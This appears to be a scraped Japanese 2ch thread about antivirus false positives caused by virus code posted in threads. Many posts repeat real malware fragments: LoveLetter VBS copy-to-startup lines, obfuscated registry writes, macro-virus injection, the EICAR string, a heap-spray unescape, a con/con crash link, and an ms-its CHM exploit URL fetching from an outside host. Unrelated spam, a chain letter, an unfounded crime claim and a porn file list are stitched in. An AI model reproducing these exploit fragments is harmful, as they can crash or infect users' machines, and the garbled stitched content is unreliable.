> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。
#include <mmlite.h> #include <stdlib.h> #include <tchar.h> UINT __cdecl _ttoh(const _TCHAR *String) { UINT Value = 0, Digit; _TCHAR c; while ((c = *String++) != _EOS) { if (c >= '0' && c <= '9') Digit = (UINT) (c - '0'); else if (c >= 'a' && c <= 'f') Digit = (UINT) (c - 'a') + 10; else if (c >= 'A' && c <= 'F') Digit = (UINT) (c - 'A') + 10; else break; Value = (Value << 4) + Digit; } return Value; }
>>1 >>2chブラウザのログ保存フォルダを「除外」に設定。
これがどういうことかもうすこし詳しく説明してください。
2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
除外に認定とは、何の除外に認定すればいいのでしょうか。
これだけでは全く意味がわかりません。
[ 自主制作映画 ] [ ジャッカル ] 第 0012 話 ジャッカルがあるさ ( Rev 0001 ) ( 低画質 Ver ).avi 7,177,218 07818b50961750fbaef7124384ac2e70 [ 自主制作映画 ] [ ジャッカル ] 第 0037 話 クッキング・オブ・ジャッカル II ( Rev 0004 ) ( 低画質 Ver ).avi 9,789,864 22b1bd0222641a2ca3cdeb2176170e1b !(映画アニメ) ドラえもん のび太と雲の王国.avi 361,081,856 65f122004a3545aac6ae276a9765bb3c ## ひぐらしのなく頃に - 暇潰し編 - 其の壱 「ヒナミザワ」.avi 147,861,504 d85b4c07df470706aae626d5c8579571 ##(ドラマ)恋の時間 第07話[704×396 DivX6.xxHe-3].avi 378,019,316 53f9c9cba3b31e05d934d3e2bb0b8f3d #289 ダウンタウンのガキの使いやあらへんで 第289回 [1995.09.03] 今日我々は豚を食べる!!+トーク.avi 143,990,332 7616f03362cb813a456f5844a5bdb956 #DMS Night24.com アナルセックス サンドイッチ あや.avi 724,464,291 751e423a7fd2f543cbb3e624048051e0
>>662 > 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。
> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。
> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。
>>664 ミミ ヽヽヽヽリリノノノノ ミ ,,、,、,、,、,、,、,、、 彡 r、r.r 、l i''" i彡 r |_,|_,|_,|| 」 /' '\ | |_,|_,|_,|/⌒/ -・=-, 、-・=-│ |_,|_,|_人そ(^i ノ( 、_, )ヽ | ・・・で? | ) ヽノ |. ノ !! | | `".`´ ノ ノ ̄i | 人 入_ノ´ ヽニニノ ノ\ / \_/\\ /|\\ / \ ト ───イ/ ヽヽ ■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap ■2ch NIS問題まとめページ
http://mickey.mirv.net/2chnis.html ■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「=w indow」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」
などの 単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00 Norton Anti Virus 2003です。 >専用ブラウザのログ保存フォルダを「除外」に設定。 オプション→Norton Anti Virus→除外→新規→項目→フォルダが開いているアイコン→フォルダの参照から2chブラウザのログ保存フォルダを選んでクリック→項目のOKをクリック。 >◆2004/2003はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をしてください。 手動で探しても、ウイルスソースが貼られたログは自動的に破棄されてしまっているので.datを選択することができません。idxだけ保存されていますが除外しても変わりなしです。 どうすれば見れるようになりますか?
>>667 自分が引用してる文章をよく読めばわかるだろうが
datやidxなどの「ファイル」を除外するのではない
「フォルダ」を正しく除外していればログが自動的に破棄されることはない
>>668 言われてやっと気付きました。ありがとうございます
Norton Anti Virus 2004を使用しています。
手動スキャンとAuto-ProtectでLogフォルダの除外と
http://mickey.mirv.net/2chnis.html ←の対処はしてありますが、
たまーに一部のウイルスソースに引っかかってしまいます。
そうなると、しばらくインターネットセキュリティを無効ししないとならなくなります。
例えば最近だと、下記のウイルスソースです。
両方なのか、片方なのか分かりませんがウイルス警告がでます。
対処方法はありますか?
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub Sub check_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PERSONAL.XLS") If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
といった感じのものです。 671か672かは分かりませんがノートンが反応してしまいます。
今やってみたのですが671と672ではノートンは反応しませんでした。 すいません、他のやつだったのかな?
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ kak.hta';ken=wd+'START kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub Sub check_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PERSONAL.XLS") If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
>>675 スマン
>>676 だと何にも反応しないんだよな
反応するときはなんなのかな?
Norton Anti Virus2003でWinXP/IE6。Live2chです。 ノートン入れたら〜のWikiを見て、 Norton AntiVirusのオプション→システム>Auto-Protect>除外→C:\Program Files\Live2ch\logフォルダを追加。 手動スキャンにも同じようにログを除外しました。 ですが専ブラを再起動させてみてもログを取得し直して見ても、このスレや他にウイルスが貼られているスレでもウイルス警告が出てきます。 間違っていないと思うのですがどうしてでしょうか…。教えてください。
>>679 >>643 辺りの件は対策しましたか?
NAVでも誤反応します。
すみません解決です
除外指定するのはlog保存フォルダじゃなくインストールフォルダ自体のことだったんですね
>>680 ありがとうございます
参考になりました
携帯厨よけの誤反応作ってくれ スレが携帯からのガキだらけで機能しなくなっちまった
>658タソのをしても反応するし2ちゃんねるのIPアドレスを除外 しても設定しても反応するし>17タソのプログラムは問題があるとかで 途中で動かなくなるしでハラ立ってきたんで ワーム防止を黙らせたった(ノ`□´)ノ≡≡≡≡≡≡≡≡┻━┻
管理者がサクージョ&規制すればいい。 専ブラ使ってる漏れとしては迷惑。
>>686 誤反応するような不便なソフトは
淘汰されて滅びたほうがいい、という考え方らすい
>>689 GUIになったのはいいけど.NET Frameworkが必要なければもっとよかったなぁ。
PCがしょぼいからできるだけ余計なものは入れたくないんだよね。
ウチでは古いバージョンの方を使わせてもらうことにします。
>>691 使っていただいてありがとうです。
.NET Frameworkを使わない前のバージョンの方が起動
が早いですね。
まあ、Visual C#で割と楽にGUIが作れるいうのが理由です^^;
<body onload=window()> eip = eip + unescape("%u7030%u4300") p + w * 10 <br> End Sub <br> LOVE-LETTER-FOR-YOU dirsystem&"\MSKernel32.vbs ms-its:mhtml:file://C: its:mhtml:file://c:\ ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines kak.hta';ken=wd+'ST Set A4 = A1.CreateTextFile(A1.BuildPath ToInfect.CodeModule.InsertLines BGN
ウィルスコードの適当な文字をNGワードに設定しとくとかじゃダメなの? スレッドをダウンロードするからNGワードとか無意味?
大空寺系には反応しなくなったけど、 OnLoad Rte CodeExec なんとかならんかなぁ
いい加減ウザくなったしどうせ更新時期だったからノートン先生からバスターに切り換えてみた。 確かに反応はしなくなったけど、何らかの不都合ってあるのかな。
ノートン先生がもうすぐ更新なんですが、 なんか、うっとうしいから今度は別のメーカーにしたいのですが・・・お勧め教えてください。 ちなみに、なぜか、Cドライブの空きは8%ぐらいしかない とんでもないPCです。
個人的にはジャストシステムから11月に発売のカスペルスキー6かな? いまライフボートから出てるカスペルスキー5を買っても6が出たらアップデートできるみたいだし
Norton Anti Virus2006を使っています。
>>658 の操作中、「現在、AutoBlockで遮断しているコンピュータ」
のところに何もアドレス等が載ってないのですが
どうすればこの先誤反応解除の操作を進められるんでしょうか。
>>703 専用ブラウザのフォルダごと全て除外にしたら俺は止まったよ
同じNorton Anti Virus2006だけど
>>703 なにも載ってないってことは
丁度そのときに遮断されてないのだから解除する必要はない。
前半の設定ができていれば問題ないのでは?
>>704 その設定で止まるやつと
インターネットワームの誤反応とは別物だよ。
ノートンがVBS.Freelink.Bというウイルスに反応したのですが、 ウイルス警告のウインドウが消しても消しても出てきます。 どうすればいいのでしょうか?
NIS2006 winSP sp2 2chスレ読み込んだら「コンピュータを攻撃するうんぬん」ってメッセージが出てその板が一定期間 アクセス不可になる現象。回避策ある?
ane doe style2.41 WinXPsp2使用 Norton Internet Security2004 Norton AntiVirus2004使用 Jane doe style2.41のログを除外しているのですが ウイルスコードが貼られてる板を開くと 「エラー」と表示され、ログを取得できません それで、いつもNorton Internet Security2004を無効にして その板を開くと、思ったとおりウイルスコードが張られています この状態になると、何分間か、その板を開く事が出来なくなります ログの除外をしているのに、なぜこうなるのでしょうか?
>>710 C\Program Files\Jane Style\Logs\2ch
なんですが、間違ってるのでしょうか?
経営学部の学生さん
>>701 です。
ありがとうございました。
11月まではノートン先生が頑張ってくれそうなので、
その後の購入の参考にします。
>>709 一定時間板が開けなくなる件の誤反応はログフォルダ除外では対応できません。
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
http://mickey.mirv.net/2chnis.html NAVの人は下記スレの698辺りから参照
ノートン誤作動対策本部
http://qb5.2ch.net/operate/kako/1133/11331/1133161720.html >>707 NIS2006はよくわからないけど上のリンクとスレ参考にしる。
>>713 ありがとうございます。
教えて頂いた
http://mickey.mirv.net/2chnis.html を
やってみて、まただめな様なら
また来ます。ありがとうございました。
ノートンが反応して、偽ウイルスを削除した場合 何かPCに問題は起こるんですか?
ウイルスを削除というか、駆除できずにファイル(?)ごと削除してるんですけど。。。 ご指導お願いします。
>>715 起こらない
>>716 2chのログファイル、またはIEキャッシュファイルを監視対象から除外
>>717 ありがとうございます。
具体的には、何を削除しているのでしょうか。
例えば、以下のようなものが削除されてしまいます。
Documents and Settings \ 名前 \ Local Settings
\ Temporary Internet Files \ Content IES \ SOUTTMDI2 \ l50[1].htm
てことは削除されてもまったく問題ないんですよね? ありがとうございました!
VShieldを有効にするってどうしたらいいんですか?
>>257 自分も
>>259 さんと同じで
こういうの貼られてたら、暫く板が開けなくなります・・
【質問】
1:ノートン使って専ブラで見ている人は、みんな実行しているのでしょうか?
2:そこでやはり↓のサイトの対処法をしないといけないのでしょうか?
http://mickey.mirv.net/2chnis.html いまいち、やるのが怖くて躊躇しているのですが・・
(ウイルスとかが)
WinXPsp2 Jane doe style2.41を使っています
別に怖いことないと思うが。
設定の意味がわからないとか漠然とした不安があるのでしょうか。
抵抗があるなら
>>689 にある誤反応スクリプト無効化ソフトを使って
その都度対処すれば良いと思います。
実行しなければ自分が不便な思いをするだけ 不便でも構わない、 危険はないと説明されても納得できない、 とにかく怖いというなら好きにすれば?
2007は誤反応しなくなったんですか? エロイ人教えて
バスターという最高のアンチウィルスがありながらどうして人はノートンを選ぶんだろう
>>728 バスターはOSを起動できなくしたという前科があるからいまいち信用できない。
>>728 >>731 前科どころか、2007は起動時にOSごとフリーズさせる実績があるから
たとえ誤反応が多くても、農豚をオススメする。
ノートンのウィルス誤反応警告の表示警告がここ2、3日で変わったのは自分だけ? 念のためにプロバイダサービスによるマカフィーも使って調べても、 ウィルスなど異常が見受けられなかったのに。
恵比寿視力回復研究所八王子クリニック大塚美容形成外科・歯科今泉ハートクリ ニック朝日大学歯学部附属村上記念病院加藤内科クリ ニックあんのうらクリニック今津赤十字病院佐賀県立病院好生館安芸市民病院お きた内科クリニックしお医院静岡県立総合病院相生山 病院愛知県がんセンターあきしまクリニック岩崎病院高茶屋診療所国立病院機構 三重中央医療センター井上記念病院小倉台柏戸クリニ ックうたせメディカルクリニックたちばな台病院青葉台病院恵比寿視力回復研究 所八王子クリニック大塚美容形成外科・歯科今泉ハー トクリニック朝日大学歯学部附属村上記念病院加藤内科クリニックあんのうらク リニック今津赤十字病院佐賀県立病院高月整形外科好 生館安芸市民病院おきた内科クリニックしお医院静岡県立総合病院相生山病院愛 知県がんセンターあきしまクリニック岩崎病院高茶屋 診療所国立病院機構三重中央医療センター井上記念病院小倉台柏戸クリニックう たせメディカルクリニック橋本内科医院市立芦別病院 北海道立本岐こじま内科額賀医院よこぎ内科胃腸科クリニック平中央医院いわき 市国民健康保険田人診療所中野中央病院佐藤医院野崎 整形外科医院高木医院木村クリニック洋向台クリニックくさの内科・眼科すけが わ内科クリニック額賀医院草野医院下遠野内科胃腸科
昨夜から急にanime鯖だけ繋がらなくなりました。 原因を探していたら、このスレを見つけたので質問させて下さい。 使用ソフト、NortonAntiVirus2006 2ch閲覧環境、IE6.0とOpenJane 症状、anime鯖の閲覧不可 専ブラでのエラー報告、SocketError#10065 Norou te to host. 誤反応スクリプト無効化ソフト導入と除外設定は済ませています。 試しにAuto-Protectをオフにしてみたのですが、それでも閲覧できませんでした。 どうすれば問題を解決できるんでしょうか。どなたかアドバイスお願いしますorz
自己解決しました 30分規制にかかっていただけみたいです
ログフォルダは除外していたのですが、2chのスレを開いてて ウィルス警告が出たので、またいつもの誤反応だと思い。 Temporary Internet Filesをスキャンしたら1158448744[1].htm にVBS.Freelink.B が見つかって「検疫」「削除」をしても駆除できません。 これもただの誤反応なのでしょうか?
ただの誤反応です
専ブラではなくIEでスレッドを閲覧したのが原因で、
>>1 に書いてある通り、別に心配ありません
Temporary Internet Filesを除外したりしてはいけません
(
>>1 以下、テンプレの各リンク先もよく読みましょう)
ノートンを2007に更新したらいろいろ探してもノートントラップを防ぐための セキュリティから除外する方法がわからないんですが、どうやってノートントラップを防げばいいんですか?
Window Live OneCareに乗り換えたらぴくりとも反応しなくなったよ
未だにウイルスコードに手焼いてるのかよ、お前ら
今こそ天下無敵OS界の重鎮Microsoft様が作ったLive OneCareに乗り換えろよw
どうせ数年で他のウイルスソフトは駆逐されるぜ
早いうちに乗り換えといた方が吉!
今なら85日無料版が使えるよ
http://ideas.live.com/programpage.aspx?versionid=b2456790-90e6-4d28-9219-5d7207d94d45 製品版は1月31日発売
価格はなんとamazonで買えば3000円ぐらいだったはず
http://www.amazon.co.jp/gp/product/B000K15VZS/ しかも、3つのPCにインストールしてもいいという大サービス
さあ、みんなWindows Live OneCareに乗り換えよう!!!
禁断の壷を開きながらスレを開くと、ログファイルが開けないよ、ログを削除 してみてとなるのはどうして?
YES → 【ヒットした?】 ─ YES → じゃあ聞くな。 / \ 【検索した?】 NO → 【半年検索した?】─ YES → 諦めろ。 \ \ NO → 死ね NO → しろ。 ↓ /!/{ / ヾ--r _ /  ̄ <_ _.>`´ __< ノ ̄ ̄`ヽ、―ニ > r‐'" ̄ ̄ ヽ 、―ニ / ´`ヽ _ 三,:三ー/ , | `ヽ _ 三,:三ー .ノヽ--/ ̄ , `  ̄/ | ノ ` ̄ ̄ ̄ ̄ ̄ } ...| /! / /⌒ヽ,| ミ } }`ー‐し'ゝL _ レ l d _} ヘr--‐‐'´} ;ーー- | ヽ、_, _,:ヘヽ------------- `ヾ---‐'ーr‐'"== .|/| \ r= ==- ヽ/l/|` ー------r‐'"  ̄ ̄ |└-- 、__/`\-:、 __,ゝ,,_____/ \_」 \
キタ━━━━━━(゚∀゚)━━━━━━ !!!!! Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
初心者ですが、CAアンチウイルス2007というウイルス対策ソフト 買ったのですが、長々と使用許諾契約書いてありますが後で何か 送られてくるとかないですよね。
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) "avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash" G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub ???????
こうじやりおれ Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) "avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash" G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) "avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash" G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) kill -9 xz/tSaBh0 Sub auto_open() Application.OnSheetActivate = "check_files" End Sub
ウイルスバスターはフリーのアンチウイルスにも劣る脅威の低検出率だった!!!!! ★権威あるAV-Test.org最新結果 (07/8/21ブログエントリー、874,822検体。 1.AVK 2007 99.88% (△0.32%, 2↑) 2.WebWasher 99.86% (△0.03%、1↓) 3.BitDefender 99.51% (△3.88%. 11↑) 4.AntiVir 99.29% (▼0.13%) 3↓) 5.Kaspersky 98.86% (△1.22%、6↑) 6.F-Secure 97.93% (±0.00%,4↓) 7.Avast! 96.99%(△0.67%, 8↑)) 8.AVG 96.81% (△0.66%, 9↑) 9.Symantec 96.75% (▼1.02%, 5↓) 10.Microsoft 96.42% (△15.86%, 23↑) 12.Sophos 94.63% (△12.88%.21↑) 13.Nod32 94.26% (△5.94%、16↑) 15.Mc.Afee 93.71% (△ 6.43%、17↑) 17.Rising 90.43% (▼5.59%、10↓) 19.Trend Micro 88.85% (▼2.12%, 15↓)10個に1個以上はスルーする計算!もはや何の役にも立ちません! ∩___∩ /) | ノ ヽ ( i ))) / ● ● | / / | ( _●_) |ノ / ここクマ――!! 彡、 |∪| ,/ /__ ヽノ /´ (___) / http://blog.chip.de/0-security-blog/microsoft-verbessert-seinen-virenscanner-20070821 G-DATA>BitDefender>AntiVir(フリー)>Kaspersky>F-Secure>Avast!(フリー)>AVG(フリー)>Symantec>Microsoft>> NOD>McAfee>>Rising(キラー)>>>>>我らがウイルスバスター2007 このスレの784なんだけど
http://ex20.2ch.net/test/read.cgi/base/1189862026/ これ貼られてから先生が怒った後にログ読み込んだらレスが見えなくなった(ちなみにLive2ch)
適当に文字列NGワードに突っ込んだらまたログ読めるようになったけど…これは何なんだ?
スレ見ようと思ったらカスペでトロイが検出されちゃった 誰か直し方知らない? 探したけどカスペのスレなかったんで…
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
ここにいろいろあって VBS.LoveLetter.Ver VAS.Freelink..B に反応しますた
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
>>762 >>764 は同じ人かな?
カスペのメニュー画面で
[ファイルアンチウィルス]→[設定]→[カスタマイズ]
を選択。
開いた窓の(ファイル形式)項目にある
「プログラムとドキュメント」
を選択すればいいと思う。デフォルトでは「すべて」になってるはず。
どちらを選ぶかはヘルプ見て自己判断。
NIS2004を使用している人に聞きたいのですが、拡張→ブラウザについての情報を遮断に設定すると強制フシアナになりますか?
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
Windows 2000にシステムの復元を薦める無職俟倶大犂 ◆UlRxjIbrcg蚤 ↓ ______ /:::::::::::::::::::::\ /::::::::::::::::::::::::::::::::\ |:::::::::::::::: | |::::::::::::::: ∪ ⌒ ⌒) |::( 6:: ` ´ | ノ::: (∵∴∪ ( ・ ・)) ゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜゚・* / ∵ 3 丿 ボクやる事2ちゃんで粘着自演だけだよっぷ ・・・・・・・・ /\ U ___ノ *・゜゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜ / .\ ____ノ\ \______ノ .\ 627 名前:ひよこ名無しさん[] 投稿日:2006/09/22(金) 21:24:37 ID:JqmRq+n+ 603 2kです。入力しても。コマンドまたはファイル名が違います。とでます。 637 名前:俟倶大犂 ◆UlRxjIbrcg [sage ?] 投稿日:2006/09/22(金) 21:32:29 ID:??? >>627 少し思い出したので参考に買いくお セーフモードが立ち上がることからコマンドプロンプトを選択して %systemroot%\system32\restore\rstrui.exe と入力してエンターで復元してみる手もあるかな あい 2009だけど 最近 2ちゃんねるのスレを開くたんびに(2ちゃんねるビューアはつかってません) ノートンが 「安全なサイトではありません」 とでるんだけど なんで最近急にでだしたのでしょうか? あと出ないようにする対策もおしえてください
2009だけど 最近 2ちゃんねるのスレを開くたんびに(2ちゃんねるビューアはつかってません) ノートンが 安全なサイトではありません とでるんだけど なんで最近急にでだしたのでしょうか? あと出ないようにする対策もおしえてください
_ ト、 ;、 \ ̄゛ー ゛v .ヽ'{ `、ー-‐ '´ Y〔. >ー /WノWヾ| ーァ ∠ , V+ 糞 + レハ ´ゝ .`〃 { {━━ ━━リ| l \ ー ∠レ!小l=・= =・=从 |、 ゝ ヽ.l /`―´\ |ノw ←真性レス乞食 糞ぴろりろりろー ◆RuNoOpaiG. /⌒ヽ∧ヘ(-=エエエ=- ) j /⌒i \| ̄ ー.丶 、__, イァ∧/|′. . < | § <X>§ { マ ヽ | § ハ§ /
174 :無職 糞ぴろりろりろー ◆RuNoOpaiG :2006/02/09(木) 10:16:28 ID:??? (・3・) エェー いよいよあと一週間で発売ですYO もうチン棒たまらんYO 175 :無職 糞ぴろりろりろー ◆RuNoOpaiG :2006/02/09(木) 10:33:56 ID:??? 何が? 176 :無職 糞ぴろりろりろー ◆RuNoOpaiG :2006/02/09(木) 10:50:48 ID:??? (・3・) エェー 言うとバカにするだろうから秘密ですYO 177 :無職 糞ぴろりろりろー ◆RuNoOpaiG :2006/02/09(木) 11:01:08 ID:??? (・3・)エー ボク チョットシカ バカにしないYO!
VBS.LoveLetter.varって言うのがノートンで検出されたんだけど誤探知? 右下の奴は赤と黄色じゃなくて緑色なんだけど・・
もしそれが2chを専用ソフトで見てて起きたのなら誤検地。 ノートンの除外リストに2chのログフォルダを登録すべし。 (スキャンとオートスキャンの除外の2箇所)
専用ソフトって2cn専用ブラウザですか? 標準のブラウザを使って見てました ちなみに警告(?)がでてた時のウィルスの場所はDドライブのtempファイルでした(Cドライブの容量がかなり少なかったのでDにtempファイルを作って設定でtempファイルを変えました) 一応CドライブもDドライブもノートンで2回ほど完全スキャンしましたがなにもでませんでした どうなんでしょうか?
標準のブラウザでも
>>16 とかを開けば反応するでしょ
まだ報道されていない犯罪です。 夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。 奈良県生駒市北部に被害者多数のようです。
まだ報道されていない犯罪です。 夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。 奈良県生駒市北部に被害者多数のようです。
. | _,ゝ┼─┼==ゞ____ . | / | |ヽ──┐ .| ./ | ら .| ヾ三三三(二二二二二二(O _____|└─┬___|___,___|_ノ┬┘ |ミ// ./←ロ-D ̄/ ~~|ミ|丘百~((====___ .└┼─┴───┴──┴──┐~~'''''-ゝ-┤ ((◎)~~~~O~~~~o~~~~O~~~~(◎))三)──)三) ゝ(◎)(◎)(◎)(◎)(◎)(◎)(◎)ノ三ノ──ノ三ノ
●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●異世界●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● これを見た人は確実に【異世界】になります。どこかに3回コピペすれば実現できます。 これは本当です。やらないと一年無駄になります。
<A href="file:///C:/con/con/con">Here</A>
ノートン導入してから2ちゃんの生活全般が見れないことがあった。 生活全般板全部が悪いサイトとみなして入らせてもらえない。 あとメールは遅くて10分ぐらいかかる。これじゃ実用に耐えられない。
